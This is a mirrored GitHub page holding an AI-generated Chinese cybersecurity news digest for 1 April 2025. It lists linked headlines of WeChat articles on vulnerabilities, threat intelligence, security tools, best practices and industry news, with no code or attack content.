mirror of
https://github.com/Hxnxe/CyberSentinel-AI.git
synced 2025-11-04 17:13:53 +00:00
3885 lines
168 KiB
Markdown
3885 lines
168 KiB
Markdown
|
|
|
|||
|
|
# 安全资讯日报 2025-04-01
|
|||
|
|
|
|||
|
|
> 本文由AI自动生成,基于对安全相关仓库、CVE和最新安全研究成果的自动化分析。
|
|||
|
|
>
|
|||
|
|
> 更新时间:2025-04-01 22:51:34
|
|||
|
|
|
|||
|
|
<!-- more -->
|
|||
|
|
|
|||
|
|
## 今日资讯
|
|||
|
|
|
|||
|
|
### 🔍 漏洞分析
|
|||
|
|
|
|||
|
|
* [原创0dayVite 任意文件读取漏洞(CVE-2025-31125)](https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247492768&idx=1&sn=48c8e492f5552230f521836b521da5fb)
|
|||
|
|
* [小程序渗透记录 通过细节挖掘漏洞的艺术](https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650609973&idx=3&sn=22a4cc7323fa115234d0884068a5fd29)
|
|||
|
|
* [高危 PHP 漏洞可绕过验证加载恶意内容](https://mp.weixin.qq.com/s?__biz=MzkzNjIzMjM5Ng==&mid=2247490358&idx=1&sn=6b611d9ca7e3011a38f481ba7d429dda)
|
|||
|
|
* [车联网安全雪佛兰重型皮卡ECU破解](https://mp.weixin.qq.com/s?__biz=Mzg5MjY0MzU0Nw==&mid=2247484921&idx=1&sn=cffaa3fb6fb165110d08cd4c103d763a)
|
|||
|
|
* [NavicatPwn:内网渗透获取 Navicat Premium 保存的数据库账密](https://mp.weixin.qq.com/s?__biz=Mzg3NzU1NzIyMg==&mid=2247484861&idx=1&sn=9f0af52a5f1d71debcd821d5c8ec414f)
|
|||
|
|
* [安全圈Ubuntu曝高危权限提升漏洞 三大绕过机制威胁Linux系统安全](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068838&idx=3&sn=cdbfe3b796e5f0bf268dc90249286921)
|
|||
|
|
* [安全圈Dell Unity 企业存储系统现严重漏洞,攻击者借此可实现 root 权限接管](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068838&idx=4&sn=002ce9534343b99abd03634daa05b2ff)
|
|||
|
|
* [微软利用AI从开源引导加载器中找到20个0day漏洞](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522638&idx=1&sn=15b5a925b5a9f1eecca2dc4a721a63a9)
|
|||
|
|
* [惠普HPE CMU曝高危漏洞:攻击者可绕过认证执行远程命令](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651317483&idx=3&sn=6085ec1328d90fbb8fcbfd9bf1ee0cea)
|
|||
|
|
* [Cannon Printer 漏洞让攻击者可以执行任意代码](https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247524207&idx=1&sn=f65dc31eb2a38abc269db7a7756db40d)
|
|||
|
|
* [Microsoft 使用 Copilot 在 GRUB2、U-Boot、Barebox 引导加载程序中发现了多个漏洞](https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247524207&idx=2&sn=63d46eaae65ecd516e9234ea9413ce94)
|
|||
|
|
* [新发现的Ubuntu安全绕过漏洞使攻击者可利用内核漏洞](https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247524207&idx=3&sn=43f6ea64d7f39b9a5a0342f1f1dda341)
|
|||
|
|
* [关键 PHP 漏洞允许黑客绕过验证以加载恶意内容](https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247524207&idx=4&sn=3eb963d2f1d71e099aa6044120c289fd)
|
|||
|
|
* [漏洞通告Vite 任意文件读取漏洞CVE-2025-31125](https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247524212&idx=1&sn=adc8b32975d00ac07cf0fd25f744e1f4)
|
|||
|
|
* [漏洞预警|金蝶 Apusic IIOP 反序列化远程代码执行漏洞](https://mp.weixin.qq.com/s?__biz=Mzg2Mjc3NTMxOA==&mid=2247517086&idx=1&sn=18d66c1e7fafedb491d9a303e6837d3f)
|
|||
|
|
* [漏洞预警|佳能打印机任意代码执行漏洞](https://mp.weixin.qq.com/s?__biz=MzI5NTUzNzY3Ng==&mid=2247489055&idx=1&sn=2a2329e9d11a252e65e75787f467d983)
|
|||
|
|
* [雷神众测漏洞周报2025.3.17-2024.3.31](https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652503355&idx=1&sn=5c2e9383e5cd263c53c2bc880d636e89)
|
|||
|
|
* [已复现Vite 任意文件读取漏洞CVE-2025-31125安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247503253&idx=1&sn=4097b8627e1a4e2b99e50ae829dae77a)
|
|||
|
|
* [上周关注度较高的产品安全漏洞20250324-20250330](https://mp.weixin.qq.com/s?__biz=MzIxNjI2NjUzNw==&mid=2247493095&idx=3&sn=bd48883c0c8a008c675158ba351fc752)
|
|||
|
|
* [信息安全漏洞周报第016期](https://mp.weixin.qq.com/s?__biz=MzA4MDk4NTIwMg==&mid=2454064089&idx=1&sn=7f3b58fad79b051f808c08c6669280d0)
|
|||
|
|
* [运营商巨头赔偿超2.3亿元:因系统漏洞令用户损失巨额资金 | 穿透技术域迷雾:如何用AI缝合安全裂痕?](https://mp.weixin.qq.com/s?__biz=MzI1OTA1MzQzNA==&mid=2651247839&idx=1&sn=d1b473dd242e6b2137bf785d8c9353df)
|
|||
|
|
* [华云安灵洞Ai.Vul快速响应“CVE-2025-30208 Vite开发服务器漏洞”预警](https://mp.weixin.qq.com/s?__biz=MzI1Njc5NTY1MQ==&mid=2247500721&idx=1&sn=f544fd017996ff6e1b0dc1b52097c330)
|
|||
|
|
|
|||
|
|
### 🔬 安全研究
|
|||
|
|
|
|||
|
|
* [能力验证题目03:SM4 分组密码算法的 ECB、CBC、CFB、OFB、CTR、BC 及 OFBNLF 七种工作模式](https://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247520603&idx=1&sn=b90de307ad8a8c1a5bff98d82a162faf)
|
|||
|
|
* [PWN入门:GLibC堆请UAF](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458591284&idx=1&sn=fd23567bfa02e8e530b70b17697f49dc)
|
|||
|
|
* [一名合格红队的成长之路](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247518937&idx=2&sn=74b0de4565e30acb5b8004801816c9d4)
|
|||
|
|
* [护航车联 | 观安信息发布车路云供应链安全研究报告(附下载)](https://mp.weixin.qq.com/s?__biz=MzIxNDIzNTcxMg==&mid=2247507579&idx=1&sn=1378a06a2bf110f4bb091c083788297b)
|
|||
|
|
* [深度研究 | 我国智能化安全运营(ISOC)市场和技术应用现状](https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651135921&idx=1&sn=9daa874fe70dc9faecaf6c2c84b0b668)
|
|||
|
|
* [CSRF漏洞利用及防御](https://mp.weixin.qq.com/s?__biz=MzA3NTc0MTA1Mg==&mid=2664712163&idx=1&sn=0ae746228f7f86d745691d269da9e62c)
|
|||
|
|
* [华中科技大学|模型上下文协议 MCP- 现状剖析、安全威胁与未来研究方向](https://mp.weixin.qq.com/s?__biz=MzU5MTM5MTQ2MA==&mid=2247491883&idx=1&sn=fd9abfd4758e9f9ace95b9a5391c9c57)
|
|||
|
|
* [特色专题 | 2024年美军网络安全项目发展动向研究](https://mp.weixin.qq.com/s?__biz=MzIxNjI2NjUzNw==&mid=2247493095&idx=2&sn=93975a04710d27be9fbb2ca8a5f0b9c4)
|
|||
|
|
* [数据安全系列文章(三):AI训练数据的新来源——合成数据](https://mp.weixin.qq.com/s?__biz=MzIyODYzNTU2OA==&mid=2247498608&idx=1&sn=b1b132af2ba4c34868b6ca3ac7a826e0)
|
|||
|
|
* [模型上下文协议(MCP, Model Context Protocol)的定位和基本机理](https://mp.weixin.qq.com/s?__biz=MzIxODM0NDU4MQ==&mid=2247506942&idx=1&sn=2813c96d37ff34389948856654538808)
|
|||
|
|
|
|||
|
|
### 🎯 威胁情报
|
|||
|
|
|
|||
|
|
* [零售巨头Sam’s Club遭Clop勒索软件攻击](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458591284&idx=3&sn=e60df2d5666066aa5a60a5374da39112)
|
|||
|
|
* [银狐超进化!引爆2025开年最大黑产攻击](https://mp.weixin.qq.com/s?__biz=MzI5NjA0NjI5MQ==&mid=2650183475&idx=1&sn=445f02d1c4b248f457be483fb9e8fe5a)
|
|||
|
|
* [加密也无用?彩虹表攻击如何瞬间破解哈希密码及应对策略](https://mp.weixin.qq.com/s?__biz=MzI5MjY4MTMyMQ==&mid=2247490953&idx=1&sn=141ecd3992b703c8b7f7b9e100375935)
|
|||
|
|
* [安全圈中国网络安全产业联盟发布《美情报机构针对全球移动智能终端实施的监听窃密活动》](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068838&idx=1&sn=80811cd5b02c7134f8643f8142f46e7e)
|
|||
|
|
* [安全圈沃尔玛旗下山姆会员商店遭黑客勒索 调查疑似数据泄露事件](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068838&idx=2&sn=203df6f4d2c7f7e840c1ea787064c191)
|
|||
|
|
* [黑客滥用 WordPress MU-Plugins 隐藏恶意代码](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522638&idx=2&sn=c6153c2985c3c2631de3f8b8da79f10d)
|
|||
|
|
* [黑客5比特币叫卖Check Point核心数据 官方否认大规模泄露](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651317483&idx=1&sn=7b784a53c74d00161496dd48aaeea71e)
|
|||
|
|
* [Telegram成新型攻击通道,DarkCloud木马伪装合法软件瞄准Windows系统](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651317483&idx=4&sn=318c940a46ddd2a893a91f1829ab76a8)
|
|||
|
|
* [Check Point被曝遭入侵,访问权限被兜售;工信部CSTIS提醒:防范Redox Stealer恶意软件的风险 | 牛览](https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651135921&idx=2&sn=29cc7995c8570e8157ed4eb13da51936)
|
|||
|
|
* [通报丨防范Redox Stealer恶意软件风险](https://mp.weixin.qq.com/s?__biz=MjM5MzMwMDU5NQ==&mid=2649171950&idx=2&sn=d57596479f4711c100ea4e63f060c0eb)
|
|||
|
|
* [疑似NSA网攻行动曝光:神秘零日漏洞利用链 目标针对俄媒体科研机构](https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247514106&idx=1&sn=ce1556ee1970bc492d3185f1b9c3046b)
|
|||
|
|
* [关于防范Redox Stealer恶意软件的风险提示](https://mp.weixin.qq.com/s?__biz=MzA5Nzc4Njg1NA==&mid=2247489225&idx=1&sn=c6cb57049a7c8059208739ebfabf09db)
|
|||
|
|
* [Lazarus通过Safe{Wallet}开发机器入侵了Bybit](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247581773&idx=1&sn=a68d5f9c73734fa483b9993666094488)
|
|||
|
|
* [国家网络安全通报中心:重点防范境外恶意网址和恶意IP](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247581773&idx=2&sn=56cbd227f7de372ad25f4e78015d3f63)
|
|||
|
|
* [黑客利用WordPress mu-plugins植入恶意代码,威胁用户安全](https://mp.weixin.qq.com/s?__biz=MzIzNDU5NTI4OQ==&mid=2247488895&idx=1&sn=a6c380e69aa731191f03c93f173fc3a0)
|
|||
|
|
* [Steam用户警惕盗号风险:数十款热门游戏安装包藏盗号木马](https://mp.weixin.qq.com/s?__biz=MzA5ODA0NDE2MA==&mid=2649788290&idx=1&sn=682f2af6bfece09603c6010fcb082f29)
|
|||
|
|
|
|||
|
|
### 🛠️ 安全工具
|
|||
|
|
|
|||
|
|
* [多屏狂喜,这些工具让你的多台显示器更好用](https://mp.weixin.qq.com/s?__biz=MzI2MjcwMTgwOQ==&mid=2247492312&idx=1&sn=d1763e52dcdd0720999b1eaa69fcc8ba)
|
|||
|
|
* [综合资产测绘工具 - fine](https://mp.weixin.qq.com/s?__biz=MzIzNTE0Mzc0OA==&mid=2247486194&idx=1&sn=d4f7723556850985c74cc9f9ce6b0dbd)
|
|||
|
|
* [漏洞盒子×阶跃星辰SRC | 漏洞盒子「企业SRC」新住客](https://mp.weixin.qq.com/s?__biz=MzA5NzQ0Mjc5NA==&mid=2649766913&idx=1&sn=4eb52c1050b8916733a01d1e0153aef3)
|
|||
|
|
* [飞塔VPN小记](https://mp.weixin.qq.com/s?__biz=MzAxNzkyOTgxMw==&mid=2247494046&idx=1&sn=9b29cc62135c2a73a6e066ea605af402)
|
|||
|
|
* [雷池WAF社区版真香测评:零成本企业级防护!](https://mp.weixin.qq.com/s?__biz=MzI1NTE2NzQ3NQ==&mid=2247487267&idx=1&sn=185977592e1a4b66a607c1903ad7019f)
|
|||
|
|
* [大模型藏入深闺不安全!山石网科推出私有大模型安全解决方案](https://mp.weixin.qq.com/s?__biz=MzAxMDE4MTAzMQ==&mid=2661299902&idx=2&sn=90faed3b270244b873468c5470794db8)
|
|||
|
|
* [前端动态调试解密签名校验的分享](https://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247491000&idx=1&sn=1d502d2361f5cf54abc315f581378bce)
|
|||
|
|
|
|||
|
|
### 📚 最佳实践
|
|||
|
|
|
|||
|
|
* [如何识别和预防深度伪造诈骗](https://mp.weixin.qq.com/s?__biz=MzA3NTIyNzgwNA==&mid=2650260033&idx=1&sn=91cfaad175f5339796566a0a2bd5fc6d)
|
|||
|
|
* [贯彻落实关基安全保护制度 《关键信息基础设施安全测评要求》标准发布](https://mp.weixin.qq.com/s?__biz=MzkxMTYzMjIwNQ==&mid=2247497075&idx=1&sn=64ab5e4a7a8c5ecd4a79c0312aec096d)
|
|||
|
|
* [等保系列(二):等保建设的具体要求](https://mp.weixin.qq.com/s?__biz=MzI5MTIwOTQ5MA==&mid=2247487875&idx=1&sn=52ebce7d7b319046ce8b4aec20f77529)
|
|||
|
|
* [如何规避人工智能带来的政务服务风险](https://mp.weixin.qq.com/s?__biz=MzU5OTQ0NzY3Ng==&mid=2247499159&idx=1&sn=312105b6834438c4efb43679b8b92d12&chksm=feb67c84c9c1f5920bddf91747ab134369fb1c5683555c386dc94fbff417522d98dffa1f3c70&scene=58&subscene=0#rd)
|
|||
|
|
* [汽车网络安全风险评估方法](https://mp.weixin.qq.com/s?__biz=MzIzOTc2OTAxMg==&mid=2247553583&idx=2&sn=f1cf4c206e6b810e246e18294b089590)
|
|||
|
|
* [Web应用程序渗透测试和漏洞赏金狩猎的综合指南](https://mp.weixin.qq.com/s?__biz=Mzg3NzU1NzIyMg==&mid=2247484861&idx=2&sn=f09d5bd239874d98b7f4518ba642a8c9)
|
|||
|
|
* [用最通俗的方式带你搞懂7大防火墙类型,看完秒变专家!](https://mp.weixin.qq.com/s?__biz=MzIyMzIwNzAxMQ==&mid=2649466947&idx=1&sn=2c51c7fd6f2bc21691ea3a90062bdedb)
|
|||
|
|
* [带你解锁编码新世界!--随波逐流CTF编码工具使用教程78 --中文电报码密码](https://mp.weixin.qq.com/s?__biz=MzU2NzIzNzU4Mg==&mid=2247489965&idx=1&sn=2256f9afd075809a3b909150cc46c4a9)
|
|||
|
|
* [VPN攻略大全,身为网工的你一定会用到!](https://mp.weixin.qq.com/s?__biz=MzU3MzU4NjI4OQ==&mid=2247516979&idx=1&sn=9dbba3ce85f2bf327c96fa1a38240438)
|
|||
|
|
* [热点|国内首个关基安全测评标准发布!360全面贯彻落实,筑牢行业基座](https://mp.weixin.qq.com/s?__biz=MzA4MTg0MDQ4Nw==&mid=2247580167&idx=1&sn=3a8b9b98e926a8a453999bf8f90b60ed)
|
|||
|
|
* [不影响业务,抢占先机,全网暴露面管理看这一篇就够了!](https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247638373&idx=2&sn=e6dbe8bb779fbbe1a9019295876017a8)
|
|||
|
|
* [落地有声专栏第二期:主动防御中蜜网建设的难题与解决之道](https://mp.weixin.qq.com/s?__biz=MzIzODQxMjM2NQ==&mid=2247500636&idx=1&sn=fe38539bdbcdabc7820821d27264e406)
|
|||
|
|
* [公共安全视频系统新规正式实行!启明星辰构筑视频安全合规防线](https://mp.weixin.qq.com/s?__biz=MzA3NDQ0MzkzMA==&mid=2651732576&idx=1&sn=4031ec61509c882f570c839fc741273f)
|
|||
|
|
* [企业为何频遭勒索攻击?解析勒索威胁的应对之道](https://mp.weixin.qq.com/s?__biz=MjM5NjY2MTIzMw==&mid=2650621703&idx=1&sn=845dcea1e315e2bff6e78cf64a0bb7e5)
|
|||
|
|
* [出现网络丢包现象时,该怎么一步一步排查?这篇文章建议收藏!](https://mp.weixin.qq.com/s?__biz=MzIyMzIwNzAxMQ==&mid=2649466946&idx=1&sn=93babaf1334490f7205426a78d20718e)
|
|||
|
|
* [当Linux常规工具失效,如何利用系统内置命令快速检测端口开放情况?](https://mp.weixin.qq.com/s?__biz=MjM5OTc5MjM4Nw==&mid=2457388213&idx=1&sn=cdf26d863687dfe3afef66355424e404)
|
|||
|
|
|
|||
|
|
### 🍉 吃瓜新闻
|
|||
|
|
|
|||
|
|
* [关注 | 针对个人信息保护问题,四部门联合开展专项行动](https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650609973&idx=2&sn=f1a01733c2dc02375e2163275ca1ebcb)
|
|||
|
|
* [中孚信息发布《中孚信息2025年3月网络安全月报》](https://mp.weixin.qq.com/s?__biz=MzAxMjE1MDY0NA==&mid=2247509119&idx=2&sn=fcc8c336752c6f9e2d54c85d7763dee9)
|
|||
|
|
* [国际 | 运营商巨头赔偿超2.3亿元:因系统漏洞令用户损失巨额资金](https://mp.weixin.qq.com/s?__biz=Mzg4MDU0NTQ4Mw==&mid=2247530213&idx=2&sn=bc7ed39e7a3e88d201015a514b3feb0d)
|
|||
|
|
* [全体注意!事关每一位安全从业者!关于公开征求《中华人民共和国网络安全法(修正草案再次征求意见稿)》意见的通知](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458591284&idx=2&sn=a02759f690ef20c00459a70a1394faef)
|
|||
|
|
* [最高等级认可|中孚信息荣升国家信息安全漏洞(CNNVD)一级技术支撑单位](https://mp.weixin.qq.com/s?__biz=MzAxMjE1MDY0NA==&mid=2247509119&idx=1&sn=7be2e1bb661c7511bcc84366885aa713)
|
|||
|
|
* [G.O.S.S.I.P 特别推荐 2025-03-31 THE WHOLE WORLD'S WATCHING](https://mp.weixin.qq.com/s?__biz=Mzg5ODUxMzg0Ng==&mid=2247499969&idx=1&sn=c8dcab220c12740630506ac54b3465a3&chksm=c063ee18f714670ea0c4dfccd7e13af61042238761fae7ac1d9ad16e5ff9e66df87a12a19393&scene=58&subscene=0#rd)
|
|||
|
|
* [刘慈欣称DeepSeek或替代科幻作家;Gemini 2.5 Pro免费;马斯克遭变性儿子狂喷:特斯拉是「庞氏骗局」|极客早知道](https://mp.weixin.qq.com/s?__biz=MTMwNDMwODQ0MQ==&mid=2653076691&idx=1&sn=69563b590e3e7dd47238d2eebf433475&chksm=7e57c1654920487345f6e378d8cd53258edbdbee01c3b55e8664cd3c2a87968100462cb4248e&scene=58&subscene=0#rd)
|
|||
|
|
* [谈思AutoSec 9周年年会首日:国内外头部专家齐聚,共襄智能网联汽车网络安全盛会](https://mp.weixin.qq.com/s?__biz=MzIzOTc2OTAxMg==&mid=2247553583&idx=1&sn=3c0a48d8c98beee082e43cddf5ad6fd5)
|
|||
|
|
* [震惊,IT男报的大瓜,一小时后删除。](https://mp.weixin.qq.com/s?__biz=MzI2MzM0NjcxNw==&mid=2247485496&idx=1&sn=4c2f97bc2568592ffd039350835d68e5)
|
|||
|
|
* [安全419 | 3月安全厂商动态:持续聚焦AI大模型 密集发布一体机](https://mp.weixin.qq.com/s?__biz=MzUyMDQ4OTkyMg==&mid=2247547410&idx=1&sn=72a172fdaee14ca944fd383e1c4cc0b4)
|
|||
|
|
* [网络安全动态 - 2025.04.01](https://mp.weixin.qq.com/s?__biz=MzU1MzEzMzAxMA==&mid=2247499986&idx=1&sn=6846e317cada964dc05df1e95270e90f)
|
|||
|
|
* [工信部:中国开源参与者全球增速最快,开发安全已成企业必修课](https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247626071&idx=1&sn=b9e27109455cd97e75f2f687628c5030)
|
|||
|
|
* [奇安信圆满完成2025年中关村论坛年会网络安全保障任务](https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247626071&idx=2&sn=4fd7a52e1becc39a7512325249e0f024)
|
|||
|
|
* [美国国家情报总监办公室发布《2025年度威胁评估》报告](https://mp.weixin.qq.com/s?__biz=MzI1OTExNDY1NQ==&mid=2651620226&idx=2&sn=7d4bebd609ebb5ada611ce5ee584b774)
|
|||
|
|
* [公安行标《关键信息基础设施安全测评要求》正式发布](https://mp.weixin.qq.com/s?__biz=MjM5MzMwMDU5NQ==&mid=2649171950&idx=1&sn=c8e7580d86222b849d690a5a5a730b64)
|
|||
|
|
* [山东省移动应用三月份安全态势](https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247520825&idx=1&sn=049803f2415e5a76622384e8b42e55ba)
|
|||
|
|
* [绿盟科技成功中标中移动信息技术有限公司API安全防护设备集采项目](https://mp.weixin.qq.com/s?__biz=MjM5ODYyMTM4MA==&mid=2650466864&idx=1&sn=de81c59398e4a89289fb3af6adb09811)
|
|||
|
|
* [安全实力获权威验证|绿盟科技深度参与第一届“网谷杯”信创软件网络安全攻防大赛](https://mp.weixin.qq.com/s?__biz=MjM5ODYyMTM4MA==&mid=2650466864&idx=2&sn=e487056c54d75688c84b374339604132)
|
|||
|
|
* [密码泄露监测网站创始人的密码泄露 密码管理器管理员密码被偷 飞天诚信:用密码技术,不是密码(口令)!](https://mp.weixin.qq.com/s?__biz=MjM5NDE1MjU2Mg==&mid=2649876872&idx=1&sn=a5887a171b2da1c74e6c6b3dbff2c974)
|
|||
|
|
* [《关键信息基础设施安全测评要求》公安行标正式发布](https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247514106&idx=2&sn=1a44061e371a0809ced32704489e328c)
|
|||
|
|
* [山石网科中标|信义玻璃工控安全防护入围项目](https://mp.weixin.qq.com/s?__biz=MzAxMDE4MTAzMQ==&mid=2661299902&idx=1&sn=b22c23650343dd203e7008046a7f2d6f)
|
|||
|
|
* [T-Mobile在SIM卡交换诉讼中损失3300万美元](https://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652115059&idx=1&sn=d3b8eee7c8c998f08b7b978d6e40fc4c)
|
|||
|
|
|
|||
|
|
### 📌 其他
|
|||
|
|
|
|||
|
|
* [还原HVV实战场景,渗透与防守无缝衔接,网安红蓝对抗实战训练(双证)](https://mp.weixin.qq.com/s?__biz=MzIwMjE2NTM5Mg==&mid=2247485552&idx=1&sn=51a47542e8b64697cae4fc7fb6e56f13)
|
|||
|
|
* [深度探秘:浙大 DeepSeek 第一、二季 12 篇公开课全解析](https://mp.weixin.qq.com/s?__biz=MzI3NjUzOTQ0NQ==&mid=2247519710&idx=1&sn=f739396a57b003e732efa496d01ffec6)
|
|||
|
|
* [《数字身份——非人类身份安全技术应用指南》报告启动及厂商调研征集](https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651135876&idx=1&sn=e3595b19847ad6c24cce6fe282d9203f&chksm=bd15af578a6226417e226bc1a059bc81ba028e01ff20c2626d8325973c7c3d1128d20bb09c7f&scene=58&subscene=0#rd)
|
|||
|
|
* [2025第13周投资收益](https://mp.weixin.qq.com/s?__biz=MzI5NzAzMDg0NA==&mid=2650698216&idx=1&sn=76a69310936ac18bd42e3bc15f3da491&chksm=f4b1943bc3c61d2d0ae6bc3fbef3d60d6ffee3cd839f6f663f63d132fe4e11b702cbf70813a6&scene=58&subscene=0#rd)
|
|||
|
|
* [聚焦 | 融信天下合作伙伴大会2025在京召开](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239583&idx=5&sn=508b53a7d0d9eae52254c46738b53529&chksm=8b581326bc2f9a30d0f2945101c8870d10d4f415ca1b4701b0a1c0b32e2553c3551fffd3c28d&scene=58&subscene=0#rd)
|
|||
|
|
* [比知乎首次盈利更重要的,是一个社区的价值回归](https://mp.weixin.qq.com/s?__biz=MTMwNDMwODQ0MQ==&mid=2653076728&idx=1&sn=71cb9743fc18ecc46f1300dfde610185&chksm=7e57c14e4920485832f6a48a7ee6485b81411d1797841d885d54960bc050cf2e737bba3480ae&scene=58&subscene=0#rd)
|
|||
|
|
* [vivo Y300 Pro+ 体验:专业选手也要「续航最强」](https://mp.weixin.qq.com/s?__biz=MTMwNDMwODQ0MQ==&mid=2653076728&idx=2&sn=4499bc0320b9d50a54c653b0aa0080d9&chksm=7e57c14e4920485840a9ee070ee5afb33ca0ad52855f87e858c7713f36f6363d718472d2378e&scene=58&subscene=0#rd)
|
|||
|
|
* [62.8 万的仰望 U7,用航母同款技术捅破 BBA「护城河」](https://mp.weixin.qq.com/s?__biz=MTMwNDMwODQ0MQ==&mid=2653076673&idx=1&sn=5d45d01511d517bb7caf20c89c4e34f2&chksm=7e57c17749204861eda85ade5e37429dda8b3f9a63731377f7f4d0301a5de8bc39d9dbf02590&scene=58&subscene=0#rd)
|
|||
|
|
* [25年首场众测挑战赛固定奖励新升级,OSRC众测重磅回归!还有限量蛇欧相送!](https://mp.weixin.qq.com/s?__biz=MzUyNzc4Mzk3MQ==&mid=2247494234&idx=1&sn=551dea2eb67e5cd48a29412a4febd08a&chksm=fa78eb16cd0f620007dd934249a66d593b16e7b288b29c92e4b68320598d80e0d95b1dea298b&scene=58&subscene=0#rd)
|
|||
|
|
* [国资领航数字经济 上城资本集团战略注资威努特](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247581756&idx=2&sn=9c1cab461ea818d4b92cebf877a9b008&chksm=e9145006de63d9105528611f123d7e000dab8712c36b32fe9551e511fc7ad074961ab9f27533&scene=58&subscene=0#rd)
|
|||
|
|
* [调查西亚哪些美国基地处于伊朗导弹瞄准线之内?](https://mp.weixin.qq.com/s?__biz=MzA3Mjc1MTkwOA==&mid=2650560458&idx=1&sn=b9a25cb983127967e5bca16fc13539fd&chksm=87117981b066f09742f23b47056970c3cd221126508d5ade541a83cfff965c401ffc621c9292&scene=58&subscene=0#rd)
|
|||
|
|
* [以终为始,行稳致远 || 求职经验分享会](https://mp.weixin.qq.com/s?__biz=MzU4NzUxOTI0OQ==&mid=2247493654&idx=1&sn=9faf95a68cf676c494c37b7f89c42469&chksm=fde86c68ca9fe57e122022a5697950b9d95d22f25226cfd02760ad76cbe0052c83027b260c93&scene=58&subscene=0#rd)
|
|||
|
|
* [一起打卡一起捐](https://mp.weixin.qq.com/s?__biz=Mzg5NDY4ODM1MA==&mid=2247485276&idx=1&sn=e7524ae6b0c3098f7d2ebe5f0c92f45d&chksm=c01a8a6df76d037bf4f8f275fa3fb8324f556f1577e3a5a617e3647a4f52863d77f1f5b7188d&scene=58&subscene=0#rd)
|
|||
|
|
* [CCSP终极指南免费领!云安全职业晋升必备!](https://mp.weixin.qq.com/s?__biz=MzIxNTM4NDY2MQ==&mid=2247516847&idx=1&sn=f00d8e85871300e17b0a890ed737de1a)
|
|||
|
|
* [升级预告!安全牛平台3.0震撼来临,赋能网络安全行业](https://mp.weixin.qq.com/s?__biz=MzIxNTM4NDY2MQ==&mid=2247516847&idx=2&sn=10cb2b2a699a2a632ea05e3067ca205a)
|
|||
|
|
* [政策驱动·合规先行 | CISAW-个人信息安全认证课程四月班火热招生](https://mp.weixin.qq.com/s?__biz=MzIxNTM4NDY2MQ==&mid=2247516847&idx=3&sn=0480b979f651ee6f16dc49876b614070)
|
|||
|
|
* [ZeroPointZero团队郑重声明](https://mp.weixin.qq.com/s?__biz=MzkyMDY5OTg5OA==&mid=2247493664&idx=1&sn=8a4f63512a406c2225ecf72d780fd618)
|
|||
|
|
* [没有技术文章分享嗷](https://mp.weixin.qq.com/s?__biz=MzkzNTQzNTQzMQ==&mid=2247485653&idx=1&sn=c94a3b036c4570e0c8a78014e4bb7fec)
|
|||
|
|
* [38页PPT DeepSeek日常实操培训](https://mp.weixin.qq.com/s?__biz=MjM5OTk4MDE2MA==&mid=2655272738&idx=1&sn=5697ced9cb2924f7410d0c0442b27cbf)
|
|||
|
|
* [国投智能(美亚柏科)培训基地4月开班计划请查收!](https://mp.weixin.qq.com/s?__biz=MjM5NTU4NjgzMg==&mid=2651443399&idx=2&sn=13ba198f67e6db366dc486a3d3e9aa16)
|
|||
|
|
* [搞安全的哪个不细?](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247518937&idx=1&sn=96fbfea0fb50d9d2a796a1a7d4fea8cd)
|
|||
|
|
* [Coze+大模型智能体环境搭建](https://mp.weixin.qq.com/s?__biz=MzAxMDIwNjg2MA==&mid=2247486291&idx=1&sn=7fbf7c48e91fc73d189a0dc61efef5d4)
|
|||
|
|
* [某个安服仔的一些想法](https://mp.weixin.qq.com/s?__biz=Mzg2NDg2MDIxNQ==&mid=2247485851&idx=1&sn=bbdd01beae15268e20f0601b24f34cb8)
